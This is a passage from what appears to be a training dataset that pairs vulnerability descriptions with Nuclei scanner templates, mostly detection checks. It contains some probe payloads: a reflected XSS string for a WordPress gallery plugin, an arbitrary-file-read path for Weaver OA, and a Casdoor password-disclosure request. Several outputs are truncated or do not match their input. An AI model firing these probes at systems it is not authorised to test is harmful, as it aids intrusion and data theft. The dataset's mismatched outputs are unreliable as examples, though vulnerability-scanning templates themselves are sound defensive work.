GET\n path:\n matchers:\n - type: word\n words:\n - \"ENC XXXX\" \n - \"http_method\" \n part: body_1\n condition: and\n - type: word\n words:\n - \"Invalid SSH public key.\" \n - \"cli_error\" \n part: body_2\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-40684"}
+{"instruction": "Generate a Nuclei template for CVE-2024-39907", "input": "Title: SQL Injection in fit2cloud 1panel\nSummary: 1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: fit2cloud 1panel\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-39907\n\ninfo:\n name: 1Panel SQL Injection - Authenticated\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: 1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n tags: cve,cve2024,sqli,1panel,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-39907"}
+{"instruction": "Generate a Nuclei template for CVE-2022-0824", "input": "Title: Vulnerability (CWE-284) in webmin webmin\nSummary: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.\nVulnerability Type: Vulnerability (CWE-284)\nSeverity: high\nAffected Products: webmin webmin\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0824\n\ninfo:\n name: Webmin <1.990 - Improper Access Control\n author: cckuailong\n severity: high\n description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2022,rce,oss,huntr,webmin,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Failed to write to /{{ranstr}}/index.html\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2022-0824"}
+{"instruction": "Generate a Nuclei template for: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection", "input": "Title: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\nSummary: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-disable-comments\n\ninfo:\n name: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\n author: ricardomaia\n severity: info\n description: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-disable-comments"}
+{"instruction": "Generate a Nuclei template for CVE-2019-13372", "input": "Title: Code Injection in dlink central_wifimanager\nSummary: /web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: dlink central_wifimanager\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-13372\n\ninfo:\n name: D-Link Central WiFi Manager CWM(100) - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: /web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.\n tags: cve,cve2019,d-link,wifimanager,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{string}}\" \n - \"/public/css/\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-13372"}
+{"instruction": "Generate a Nuclei template for CVE-2008-0702", "input": "Title: Buffer Overflow in south_river_technologies titan_ftp_server\nSummary: Multiple heap-based buffer overflows in Titan FTP Server 6.03 and 6.0.5.549 allow remote attackers to cause a denial of service (daemon crash or hang) and possibly execute arbitrary code via a long argument to the (1) USER or (2) PASS command, different vectors than CVE-2004-1641.\nVulnerability Type: Buffer Overflow\nSeverity: high\nAffected Products: south_river_technologies titan_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2008-0702\n\ninfo:\n name: Titan FTP Server 6.03 and 6.0.5.549 - Heap Overflow via Long Commands\n author: pussycat0x\n severity: critical\n description: Titan FTP Server versions 6.03 and 6.05 (builds) contain multiple heap-based buffer overflow vulnerabilities. Remote attackers can cause denial of service (daemon crash) or potentially execute arbitrary code by sending excessively long USER, PASS, or other FTP commands that trigger heap overflows.\n tags: cve,cve2008,network,ftp,titan-ftp,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2008-0702"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: veeam-backup-manager-login\n\ninfo:\n name: Veeam Backup Enterprise Manager Login - Detect\n author: Charles D\n severity: info\n description: Veeam Backup Enterprise Manager Login\n tags: veeam,panel,enterprise-manager,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.aspx\" \n matchers:\n - type: word\n words:\n - \"Veeam Backup Enterprise Manager : Login\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2020-7961", "input": "Title: Deserialization of Untrusted Data in liferay liferay_portal\nSummary: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: liferay liferay_portal\nIndicators: error, vulnerability detected", "output": "id: liferay-workflow\n\ninfo:\n name: Liferay Security Checks\n author: dwisiswant0\n severity: info\n description: A simple workflow that runs all liferay related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-7961"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Arkose Labs Client API", "input": "Title: Content-Security-Policy Bypass - Arkose Labs Client API\nSummary: Content-Security-Policy Bypass - Arkose Labs Client API\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: arkoselabs-client-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Arkose Labs Client API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Arkose Labs Client API\n tags: xss,csp-bypass,arkoselabs-client-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"arkoselabs.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "arkoselabs-client-api-csp-bypass"}
+{"instruction": "Generate a Nuclei template for: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read", "input": "Title: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read\nSummary: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read. The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: weaver-sptmforportalthumbnail-lfi\n\ninfo:\n name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read\n author: SleepingBag945\n severity: high\n description: The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.\n tags: weaver,e-cology,oa,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp\" \n matchers:\n - type: word\n words:\n - \"weaver.general.BaseBean\" \n - \"getServletConfig\" \n part: body\n condition: and\n - type: word\n words:\n - \"image/png\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "weaver-sptmforportalthumbnail-lfi"}
+{"instruction": "Generate a Nuclei template for: Halo ITSM - Pre-Authentication SQL Injection", "input": "Title: Halo ITSM - Pre-Authentication SQL Injection\nSummary: Halo ITSM - Pre-Authentication SQL Injection. A Time-Based SQL Injection vulnerability in Halo ITSM allows unauthenticated attackers to execute malicious SQL queries by leveraging time delays, potentially leading to data exfiltration, privilege escalation, or full system compromise.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: halo-tism-sqli\n\ninfo:\n name: Halo ITSM - Pre-Authentication SQL Injection\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: A Time-Based SQL Injection vulnerability in Halo ITSM allows unauthenticated attackers to execute malicious SQL queries by leveraging time delays, potentially leading to data exfiltration, privilege escalation, or full system compromise.\n tags: halo,itsm,sqli,time-based-sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "halo-tism-sqli"}
+{"instruction": "Generate a Nuclei template for: Apache Hertzbeat - Detect", "input": "Title: Apache Hertzbeat - Detect\nSummary: Apache Hertzbeat - Detect. Detects a Apache Hertzbeat web application is in use, that is a real-time monitoring system with agentless, performance cluster, prometheus-compatible, custom monitoring and status page building capabilities.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-hertzbeat-detect\n\ninfo:\n name: Apache Hertzbeat - Detect\n author: icarot\n severity: info\n description: Detects a Apache Hertzbeat web application is in use, that is a real-time monitoring system with agentless, performance cluster, prometheus-compatible, custom monitoring and status page building capabilities.\n tags: tech,hertzbeat,apache,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/app-data.json\" \n matchers:\n - type: word\n words:\n - \"\"name\": \"HertzBeat\"\" \n - \"hertzbeat.apache.org\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-hertzbeat-detect"}
+{"instruction": "Generate a Nuclei template for: Casdoor get-users Account Password Disclosure", "input": "Title: Casdoor get-users Account Password Disclosure\nSummary: Casdoor get-users Account Password Disclosure. Casdoor get-users Account Password is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: casdoor-users-password\n\ninfo:\n name: Casdoor get-users Account Password Disclosure\n author: DhiyaneshDk\n severity: high\n description: Casdoor get-users Account Password is exposed.\n tags: casdoor,exposure,misconfig,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/get-users?p=123&pageSize=123\" \n matchers:\n - type: word\n words:\n - \"\"name\":\" \n - \"\"password\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "casdoor-users-password"}
+{"instruction": "Generate a Nuclei template for: Caucho Resin LFR", "input": "Title: Caucho Resin LFR\nSummary: Caucho Resin LFR. There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: resin-viewfile-lfr\n\ninfo:\n name: Caucho Resin LFR\n author: princechaddha\n severity: high\n description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.\n tags: resin,caucho,lfr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resin-doc/viewfile/?file=index.jsp\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %\" \n part: body", "category": "generic", "severity": "high", "id": "resin-viewfile-lfr"}
+{"instruction": "Generate a Nuclei template for: Elastic HD Dashboard Exposure", "input": "Title: Elastic HD Dashboard Exposure\nSummary: Elastic HD Dashboard Exposure. Elastic HD Dashboard is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: elastic-hd-dashboard\n\ninfo:\n name: Elastic HD Dashboard Exposure\n author: tess\n severity: low\n description: Elastic HD Dashboard is exposed.\n tags: misconfig,exposure,elastic,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Elastic HD Dashboard\" \n - \"elasticsearch go Edition head plugin\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "elastic-hd-dashboard"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Akamai Content", "input": "Title: Content-Security-Policy Bypass - Akamai Content\nSummary: Content-Security-Policy Bypass - Akamai Content. Tags: xss, csp-bypass, akamai-content\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: akamai-content-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Akamai Content\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Akamai Content\n tags: xss,csp-bypass,akamai-content,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"akamai.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "akamai-content-csp-bypass"}
+{"instruction": "Generate a Nuclei template for CVE-2023-7028", "input": "Title: Vulnerability (CWE-640) in gitlab gitlab\nSummary: An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\nVulnerability Type: Vulnerability (CWE-640)\nSeverity: critical\nAffected Products: gitlab gitlab\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-7028\n\ninfo:\n name: GitLab - Account Takeover via Password Reset\n author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch\n severity: high\n description: An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2023-7028"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: grails-database-admin-console\n\ninfo:\n name: Grails Admin Console Panel - Detect\n author: emadshanab\n severity: medium\n description: Grails Admin Console panel was detected.\n tags: grails,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dbconsole/\" \n - \"{{BaseURL}}/h2-console/\" \n matchers:\n - type: word\n words:\n - \"H2 Console\" \n - type: word\n words:\n - \"Sorry, remote connections ('webAllowOthers') are disabled on this server\"", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: New Relic Pixie API Key", "input": "Title: New Relic Pixie API Key\nSummary: New Relic Pixie API Key. Tags: file, keys, newrelic\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-pixie-apikey\n\ninfo:\n name: New Relic Pixie API Key\n author: DhiyaneshDK\n severity: info\n description: New Relic Pixie API Key\n tags: file,keys,newrelic,pixie,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-pixie-apikey"}
+{"instruction": "Generate a Nuclei template for CVE-2021-24291", "input": "Title: Cross-Site Scripting (XSS) in 10web photo_gallery\nSummary: The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery WordPress plugin before 1.5.69 was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and _id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: 10web photo_gallery\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24291\n\ninfo:\n name: WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//\" \n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"onmouseover=alert(document.domain)//\" \n - \"wp-content/uploads/photo-gallery\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24291"}
+{"instruction": "Generate a Nuclei template for CVE-2023-27292", "input": "Title: Vulnerability (CWE-601) in opencats opencats\nSummary: An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET parameters.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: opencats opencats\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-27292\n\ninfo:\n name: OpenCATS - Open Redirect\n author: r3Y3r53\n severity: medium\n description: OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n tags: cve2023,cve,authenticated,tenable,opencats,redirect,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Page Preview\" \n - \"\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-27292"}
+{"instruction": "Generate a Nuclei template for CVE-2023-33440", "input": "Title: Code Injection in faculty_evaluation_system_project faculty_evaluation_system\nSummary: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\nVulnerability Type: Code Injection\nSeverity: high\nAffected Products: faculty_evaluation_system_project faculty_evaluation_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-33440\n\ninfo:\n name: Faculty Evaluation System v1.0 - Remote Code Execution\n author: Harsh\n severity: high\n description: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-33440"}
+{"instruction": "Generate a Nuclei template for: Doppler SCIM Token", "input": "Title: Doppler SCIM Token\nSummary: Doppler SCIM Token. Tags: doppler, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: doppler-scim-token\n\ninfo:\n name: Doppler SCIM Token\n author: DhiyaneshDK\n severity: info\n description: Doppler SCIM Token\n tags: doppler,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "doppler-scim-token"}
+{"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: xss-fuzz\n\ninfo:\n name: Fuzzing Parameters - Cross-Site Scripting\n author: kazet\n severity: medium\n description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.\n tags: xss,generic,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?{{xss_param}}\" \n matchers:\n - type: word\n words:\n - \"'>\"